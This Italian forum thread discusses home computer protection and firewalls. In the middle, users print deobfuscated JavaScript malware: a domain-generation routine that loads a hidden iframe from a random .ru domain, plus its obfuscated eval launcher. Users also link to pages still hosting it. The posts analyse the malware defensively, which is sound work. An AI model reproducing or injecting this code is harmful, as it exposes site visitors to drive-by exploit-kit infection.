Protezione del Computer: consigli e valutazioni

[jedy48]

Quote:

Originariamente inviato da Kohai

Non era una toolbar, si trattava di spyware/malware, poco ma sicuro.
E comunque, fosse stata una toolbar indesiderata? Senza un software in grado di riconoscerla ce l'avrei avuta bella che installata.
Prevenire e' meglio che curare giusto?

Sai quante volte navigando in internet vengo avvisato dall'antivirus (o dagli stessi dns) che il sito in questione e' pericoloso?

Tornando al discorso di prima, la sicurezza totale non esiste, ma non dobbiamo andare agli antipodi scrivendo che un firewall e/o altri software non servono.

per istallare un software non è che si istalla da solo, basta avere l'accortezza sempre di fare istallazione custom e non come vogliono loro

[fcorbelli]

Quote:

Originariamente inviato da Kohai

Avrei trovato questo ->

http://www.urlvoid.com/scan/kudena.ru/

EDIT: eccolo qua, mi aspettavo di meglio, è un semplice vettore in cui i caratteri ASCII sono
da decodificare modulo 4 +1.

Codice:

function nextRandomNumber(){
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if(test > 0){
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix){
    var d = new Date(unix*1000);
    var s = d.getHours() > 12 ? 1 : 0;
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}

function createRandomNumber(r, Min, Max){
    return Math.round((Max-Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone){
    var rand = new RandomNumberGenerator(unix);
    var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
    var str = '';
    for(var i = 0; i < length; i ++ ){
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}

setTimeout(function(){
    try{
        if(typeof iframeWasCreated == "undefined"){
            iframeWasCreated = true;
            var unix = Math.round(+new Date()/1000);
            var domainName = generatePseudoRandomString(unix, 16, 'ru');
            ifrm = document.createElement("IFRAME"); 
            ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=cx"); 
            ifrm.style.width = "0px"; 
            ifrm.style.height = "0px"; 
            ifrm.style.visibility = "hidden"; 
            document.body.appendChild(ifrm);
        }
    }catch(e){}
}, 500);

E questo è il "lanciatore" (un pochino rimaneggiato)

Codice:

try{
q=document.createElement("p");
q.appendChild(q+"");
}
catch(qw)
{
h=-012/5;
try{bcsd=prototype-2;}
catch(bawg)

[...] ss = quella roba sopra
e(ss);

Mò vado davvero a magnà, a domani i commenti sul frame "nascosto"

[Chill-Out]

Quote:

Originariamente inviato da fcorbelli

In questo caso la situazione è assai più semplice.
Se si utilizza un router ADSL un firewall software non serve a nulla.
Lo riscrivo: a nulla.
Non è questione di maggior o minor competenze.

Un firewall utilizzato per bloccare le connessioni dall'esterno (* prima o poi bisogna che riscriva per bene perchè le porte "stealth" non aggiungono nessuna sicurezza) verso porte e servizi potenzialmente vulnerabili, che è poi l'utilizzo tipico per uso casereccio, è totalmente inutile con un router che droppa tutti i pacchetti senza instradarli verso uno degli host della LAN (situazione normale).

L'uso per il controllo del traffico interno-esterno è parimenti inutile in ambito casereccio, perchè sapere quali siano le mie connessioni, o controllarle, è francamente poco rilevante (oltre che ottenibile banalmente con un netstat su windows, se uno è proprio curioso)
---
Un firewall (hardware o software è uguale, ovviamente "hardware" significa semplicemente "software" a sua volta) interno-esterno ha lo scopo, tipicamente, di IMPEDIRE l'utilizzo di certi servizi.
Esempio bloccare messenger o skype (* per skype la situazione è piuttosto complicata ma fermo qui), impedire l'utilizzo della posta elettronica, emule etc.

Tutte attività che mi paiono difficilmente interessanti in ambito casareccio.
---
L'ulteriore funzione, ovvero quello di "impedire" il diffondersi di "infezioni", ovvero tentar di bloccare un attacco che arriva dalla LAN (esempio: più computer infetti in rete locale) non ha, nuovamente, un grandissimo senso.
Sia perchè se ho un computer solo => non mi arriva nessun attacco.
Sia perchè gli "attacchi" LAN sono poco diffusi e quasi praticamente inutili (* lato-windows avvengono tipicamente sulla 139 per la condivisione NBT, ma lì il firewall non fa tra il nulla ed il quasi nulla)
---
Ecco perchè (versione breve)
- hai un router ADSL?
- hai un singolo computer?
- > non serve a nulla un firewall software, anzi è negativo perchè aumenta la superficie d'attacco e quindi, paradossalmente, la vulnerabilità
---
Poi queste sono le mie conclusioni, magari qualcuno argomenta qualcosa di diverso, ma NON sulla falsariga "male non fa... meglio metterlo... non si sa mai..." e così via.

Intercetta con il FW del Router o con il comando Netstat, un processo legittimo iniettato dal malware di turno.

[Chill-Out]

Quote:

Originariamente inviato da fcorbelli

Se rispondo succede un disastro, è il primo post che ho messo in questo thread.
Riguardo a quel javascript ti confermo che c'è una robina strana appesa in fondo, non ti so dire se è un sistema di "protezione" (per rendere meno banale copiare un pezzo di codice di testo) oppure se è un tentativo di usare un qualche bug per fare non so che.
Può essere quindi un falso positivo, nel senso che l'antivirus vedendo "una roba strana" si proccupa, oppure anche un vero malware.

Se trovo il tempo lo decodifico, così vediamo

EDIT: confermo che è un malware di qualche genere, e che viene inettato dentro un po' di tutto
(html, php e javascript), evidentemente anche in versioni bacate di WORDPRESS (o meglio con privilegi
di scrittura ove non dovrebbero esserci).
Sembra perfino abbastanza diffuso su internet

Javascript Trojan >>>>> Blackhole Exploit Kit

[Perseverance]

Quote:

Originariamente inviato da fcorbelli

EDIT: eccolo qua, mi aspettavo di meglio, è un semplice vettore in cui i caratteri ASCII sono
da decodificare modulo 4 +1.

Si sono evoluti , 2 mesi fà ne trovai uno simile che ricomponeva il nome usando il valore decimale castandolo a char

[fcorbelli]

Quote:

Originariamente inviato da Perseverance

Si sono evoluti , 2 mesi fà ne trovai uno simile che ricomponeva il nome usando il valore decimale castandolo a char

Codice:

/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[...];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}/*qhk6sa6g1c*/

Mah, ci ho messo un 5 minuti a "sproteggerlo", è il classico bimbominkia-malware

[Chill-Out]

Quote:

Originariamente inviato da fcorbelli

Codice:

/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[...];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}/*qhk6sa6g1c*/

Mah, ci ho messo un 5 minuti a "sproteggerlo", è il classico bimbominkia-malware

https://www.virustotal.com/file/9bf4...is/1340014286/

[fcorbelli]

Quote:

Originariamente inviato da Chill-Out

https://www.virustotal.com/file/9bf4...is/1340014286/

Se hai sottoposto il jcarousel.js del sito androidianiqualcosa segnalo che l'hanno già corretto ieri.
Questo è l'originale di quel sito
francocorbelli.com/virusselli/jcarousel.js
da cui ho "sprotetto" il malware

Ce ne son tanti in giro, eccone uno carino
temptationfoods.com/brand_KarenAnand_Conserves.asp?catid=1

[Chill-Out]

Quote:

Originariamente inviato da fcorbelli

Se hai sottoposto il jcarousel.js del sito androidianiqualcosa segnalo che l'hanno già corretto ieri.
Questo è l'originale di quel sito
francocorbelli.com/virusselli/jcarousel.js
da cui ho "sprotetto" il malware

Ce ne son tanti in giro, eccone uno carino
temptationfoods.com/brand_KarenAnand_Conserves.asp?catid=1

http://www.hwupgrade.it/forum/showpo...postcount=4855

[Ciccioformaggio11]

Quote:

Originariamente inviato da fcorbelli

Se hai sottoposto il jcarousel.js del sito androidianiqualcosa segnalo che l'hanno già corretto ieri.
Questo è l'originale di quel sito
francocorbelli.com/virusselli/jcarousel.js
da cui ho "sprotetto" il malware

Ho aperto il sito su evidenziato ed è uscito l'avviso dell'antivirus.
Posso stare tranquillo?

[marcoesse]

Quote:

Originariamente inviato da Ciccioformaggio11

Ho aperto il sito su evidenziato ed è uscito l'avviso dell'antivirus.

idem

[Nicodemo Timoteo Taddeo]

Quote:

Originariamente inviato da Ciccioformaggio11

Ho aperto il sito su evidenziato ed è uscito l'avviso dell'antivirus.
Posso stare tranquillo?

Quote:

Originariamente inviato da marcoesse

idem

Certo che è ben strano e degno di essere riportato che uno mette su un server un file malevolo e se si prova a scaricare gli antivirus intervengono a bloccare l'operazione. Decisamente strano... ma di che hanno discusso negli ultimi post di questo thread?


Saluti.

[Chill-Out]

Quote:

Originariamente inviato da Ciccioformaggio11

Ho aperto il sito su evidenziato ed è uscito l'avviso dell'antivirus.
Posso stare tranquillo?

Quote:

Originariamente inviato da marcoesse

idem

Perchè aprite un link editato?

[Ciccioformaggio11]

Quote:

Originariamente inviato da Chill-Out

Perchè aprite un link editato?

hai ragione

Ho svuotato la cartella temp e quella di chrome, ora è normale che ogni volta che apro la pagina di questo forum precedente a questa (pag 243, ossia dove era il link) mi esca l'avviso dell'antivirus?

[Chill-Out]

Quote:

Originariamente inviato da Ciccioformaggio11

hai ragione

Ho svuotato la cartella temp e quella di chrome, ora è normale che ogni volta che apro la pagina di questo forum precedente a questa (pag 243, ossia dove era il link) mi esca l'avviso dell'antivirus?

Si

[the_noiser]

Consiglio su configurazione di sicurezza su windows 7 64 bit
real time:
1.antivirus: avira personal 12
2.firewall:Private Firewall 7.0.28.1

on demand:
HitmanPro 3.6.0 64bit
Malwarebytes Anti-Malware
Sandboxie (per navigazione su siti sconosciuti e per aprire programmi sconosciuti e potenzialmente infetti)

Browser:
Firefox-Google Chrome-Opera con Adblockplus+Wot

Norton dns A - Security (malware, phishing sites and scam sites) configurati direttamente nel router

Chiedo giudizi sulla configurazione e consigli su eventuali miglioramenti!

[Draven94]

@ the_noiser
Per me la tua configurazione va benissimo. Non cambierei nè più nè meno.

[the_noiser]

Quote:

Originariamente inviato da Draven94

@ the_noiser
Per me la tua configurazione va benissimo. Non cambierei nè più nè meno.

benissimo!!!!
pensavo dovessi configurare meglio i browser con qualche plugin di sicurezza in più
volendo fare qualche test???

Quote:

Originariamente inviato da marcoesse

idem

Con la versione personal di avira?
viene bloccato l'url?

[Draven94]

Sulla questione browser c'è questo specifico thread in cui vengono suggerite le migliori configurazioni possibili in termini di sicurezza e con suggerimenti riguardo le eventuali estensioni da adottare. E' tutto spiegato in modo molto esauriente. D'altronde utilizzi 3 browser quindi quel thread devi leggerlo per forza

[the_noiser]

Quote:

Originariamente inviato da Draven94

Sulla questione browser c'è questo specifico thread in cui vengono suggerite le migliori configurazioni possibili in termini di sicurezza e con suggerimenti riguardo le eventuali estensioni da adottare. E' tutto spiegato in modo molto esauriente. D'altronde utilizzi 3 browser quindi quel thread devi leggerlo per forza

bene...grazie mille!!!!!

Quote:

Originariamente inviato da the_noiser

benissimo!!!!
Con la versione personal di avira?
viene bloccato l'url?

mbe?